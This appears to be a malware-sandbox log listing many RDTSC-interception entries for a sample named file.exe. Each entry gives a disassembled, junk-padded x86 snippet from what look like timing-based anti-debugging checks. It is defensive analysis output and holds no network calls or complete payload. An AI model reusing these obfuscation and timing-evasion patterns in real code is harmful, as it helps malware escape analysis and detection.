Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0554 second address: 50E05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007F856102FBEAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f jmp 00007F856102FBF0h 0x00000014 lea eax, dword ptr [ebp-04h] 0x00000017 jmp 00007F856102FBF0h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F856102FBF7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E05A5 second address: 50E05E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F856106A85Ah 0x00000013 xor ecx, 6A670538h 0x00000019 jmp 00007F856106A85Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E05E4 second address: 50E060B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F856102FBEAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E060B second address: 50E061A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E061A second address: 50E0632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856102FBF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0632 second address: 50E0646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx ecx, bx 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0646 second address: 50E064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0663 second address: 50E0687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A866h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0687 second address: 50E06A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E06A4 second address: 50E06B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D002D second address: 50D0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0055 second address: 50D0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3D755AD4h 0x00000008 mov bl, 50h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0069 second address: 50D00D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F856102FBF4h 0x00000009 xor cl, FFFFFFB8h 0x0000000c jmp 00007F856102FBEBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F856102FBF8h 0x00000018 or eax, 447FAC18h 0x0000001e jmp 00007F856102FBEBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F856102FBF5h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00D7 second address: 50D00DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00DD second address: 50D00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00E1 second address: 50D00E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00E5 second address: 50D0146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a pushad 0x0000000b call 00007F856102FBF5h 0x00000010 call 00007F856102FBF0h 0x00000015 pop eax 0x00000016 pop ebx 0x00000017 pushfd 0x00000018 jmp 00007F856102FBF0h 0x0000001d and eax, 43AFFB38h 0x00000023 jmp 00007F856102FBEBh 0x00000028 popfd 0x00000029 popad 0x0000002a push 6A13E6FFh 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0146 second address: 50D014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D014C second address: 50D01F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0BB2B749h 0x00000010 jmp 00007F856102FBF6h 0x00000015 call 00007F856102FBE9h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F856102FBEEh 0x00000021 or cx, F728h 0x00000026 jmp 00007F856102FBEBh 0x0000002b popfd 0x0000002c mov eax, 0386F41Fh 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007F856102FBF5h 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d push ebx 0x0000003e mov eax, 0B64C159h 0x00000043 pop ecx 0x00000044 jmp 00007F856102FBEFh 0x00000049 popad 0x0000004a mov eax, dword ptr [eax] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F856102FBEBh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D01F3 second address: 50D0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0210 second address: 50D0220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856102FBECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0220 second address: 50D0224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0224 second address: 50D02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F856102FBECh 0x00000013 adc si, E0A8h 0x00000018 jmp 00007F856102FBEBh 0x0000001d popfd 0x0000001e mov edx, ecx 0x00000020 popad 0x00000021 pop eax 0x00000022 jmp 00007F856102FBF2h 0x00000027 mov eax, dword ptr fs:[00000000h] 0x0000002d pushad 0x0000002e mov eax, 7C1B1FDDh 0x00000033 mov ah, DCh 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov dx, si 0x0000003b mov dh, ah 0x0000003d popad 0x0000003e mov dword ptr [esp], eax 0x00000041 jmp 00007F856102FBEFh 0x00000046 sub esp, 18h 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F856102FBF4h 0x00000050 xor eax, 4BD0C7C8h 0x00000056 jmp 00007F856102FBEBh 0x0000005b popfd 0x0000005c mov ebx, eax 0x0000005e popad 0x0000005f xchg eax, ebx 0x00000060 jmp 00007F856102FBF2h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F856102FBEEh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D02E0 second address: 50D0318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F856106A861h 0x00000009 add ax, FA46h 0x0000000e jmp 00007F856106A861h 0x00000013 popfd 0x00000014 mov dh, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0318 second address: 50D031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D031C second address: 50D0330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A860h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0330 second address: 50D0357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0357 second address: 50D035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D035D second address: 50D0361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0361 second address: 50D0399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A863h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 push eax 0x00000011 mov al, bh 0x00000013 pop esi 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F856106A862h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0399 second address: 50D039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D039F second address: 50D03DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov al, AFh 0x0000000c mov eax, ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], edi 0x00000012 jmp 00007F856106A863h 0x00000017 mov eax, dword ptr [75C74538h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F856106A860h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03DD second address: 50D03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03E1 second address: 50D03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03E7 second address: 50D03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03ED second address: 50D0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A868h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e jmp 00007F856106A860h 0x00000013 xor eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007F856106A868h 0x00000020 sub si, B1E8h 0x00000025 jmp 00007F856106A85Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0450 second address: 50D0476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F856102FBF9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C048A second address: 50C054C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F856106A867h 0x00000015 or al, 0000004Eh 0x00000018 jmp 00007F856106A869h 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push ebx 0x00000024 pushfd 0x00000025 jmp 00007F856106A868h 0x0000002a or al, FFFFFFF8h 0x0000002d jmp 00007F856106A85Bh 0x00000032 popfd 0x00000033 pop ecx 0x00000034 mov bx, 853Ch 0x00000038 popad 0x00000039 sub esp, 2Ch 0x0000003c jmp 00007F856106A85Bh 0x00000041 xchg eax, ebx 0x00000042 jmp 00007F856106A866h 0x00000047 push eax 0x00000048 jmp 00007F856106A85Bh 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f jmp 00007F856106A85Bh 0x00000054 popad 0x00000055 xchg eax, edi 0x00000056 pushad 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0723 second address: 50C0729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0729 second address: 50C072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C072F second address: 50C0755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0755 second address: 50C0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0759 second address: 50C0776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0776 second address: 50C0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F85D1BC8557h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ch, dh 0x00000014 mov cl, 73h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0799 second address: 50C0815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F856102FC9Ch 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F856102FBEEh 0x00000016 xor eax, 3D39A718h 0x0000001c jmp 00007F856102FBEBh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F856102FBF8h 0x00000028 jmp 00007F856102FBF5h 0x0000002d popfd 0x0000002e popad 0x0000002f cmp dword ptr [ebp-14h], edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F856102FBEDh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0815 second address: 50C0825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0825 second address: 50C0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0829 second address: 50C0843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F85D1BC84C0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F856106A85Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0843 second address: 50C0870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 pushfd 0x00000006 jmp 00007F856102FBEAh 0x0000000b sub ax, DD68h 0x00000010 jmp 00007F856102FBEBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0870 second address: 50C088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C088B second address: 50C090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007F856102FBEEh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov cx, 4CEDh 0x00000017 mov eax, 3B59CAE9h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F856102FBEBh 0x00000025 pop eax 0x00000026 call 00007F856102FBF9h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov dx, E994h 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007F856102FBF3h 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C090F second address: 50C092A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C09E6 second address: 50C0053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov eax, 6533711Bh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 je 00007F85D1B8D841h 0x0000001a xor eax, eax 0x0000001c jmp 00007F856100931Ah 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 cmp eax, 00000000h 0x0000002c setne cl 0x0000002f xor ebx, ebx 0x00000031 test cl, 00000001h 0x00000034 jne 00007F856102FBE7h 0x00000036 jmp 00007F856102FD5Bh 0x0000003b call 00007F8565F08E85h 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F856102FBF5h 0x00000049 or cx, C936h 0x0000004e jmp 00007F856102FBF1h 0x00000053 popfd 0x00000054 push eax 0x00000055 push edx 0x00000056 pushfd 0x00000057 jmp 00007F856102FBEEh 0x0000005c add eax, 308C7058h 0x00000062 jmp 00007F856102FBEBh 0x00000067 popfd 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0053 second address: 50C008D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F856106A868h 0x00000008 jmp 00007F856106A865h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C008D second address: 50C0094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0094 second address: 50C00BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov cl, 34h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F856106A866h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C00BC second address: 50C00C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C00C2 second address: 50C011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A864h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F856106A860h 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F856106A85Dh 0x0000001a sub ecx, 2B078176h 0x00000020 jmp 00007F856106A861h 0x00000025 popfd 0x00000026 mov di, si 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C011A second address: 50C0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0120 second address: 50C0124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C018A second address: 50C01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushfd 0x00000007 jmp 00007F856102FBEAh 0x0000000c sub ah, FFFFFFB8h 0x0000000f jmp 00007F856102FBEBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F856102FBF5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0DC7 second address: 50C0DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0E93 second address: 50C0E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0E99 second address: 50C0EAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 31318802h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EAE second address: 50C0EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EB4 second address: 50C0EB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EB9 second address: 50C0EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F85D1B84888h 0x00000011 push 75C12B70h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov eax, dword ptr [esp+10h] 0x00000021 mov dword ptr [esp+10h], ebp 0x00000025 lea ebp, dword ptr [esp+10h] 0x00000029 sub esp, eax 0x0000002b push ebx 0x0000002c push esi 0x0000002d push edi 0x0000002e mov eax, dword ptr [75C74538h] 0x00000033 xor dword ptr [ebp-04h], eax 0x00000036 xor eax, ebp 0x00000038 push eax 0x00000039 mov dword ptr [ebp-18h], esp 0x0000003c push dword ptr [ebp-08h] 0x0000003f mov eax, dword ptr [ebp-04h] 0x00000042 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000049 mov dword ptr [ebp-08h], eax 0x0000004c lea eax, dword ptr [ebp-10h] 0x0000004f mov dword ptr fs:[00000000h], eax 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov cx, bx 0x0000005c mov eax, edx 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EDE second address: 50C0EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A862h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07AD second address: 50E07B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07B1 second address: 50E07B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07B7 second address: 50E07CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6CC3A783h 0x00000008 mov eax, 568F38DFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
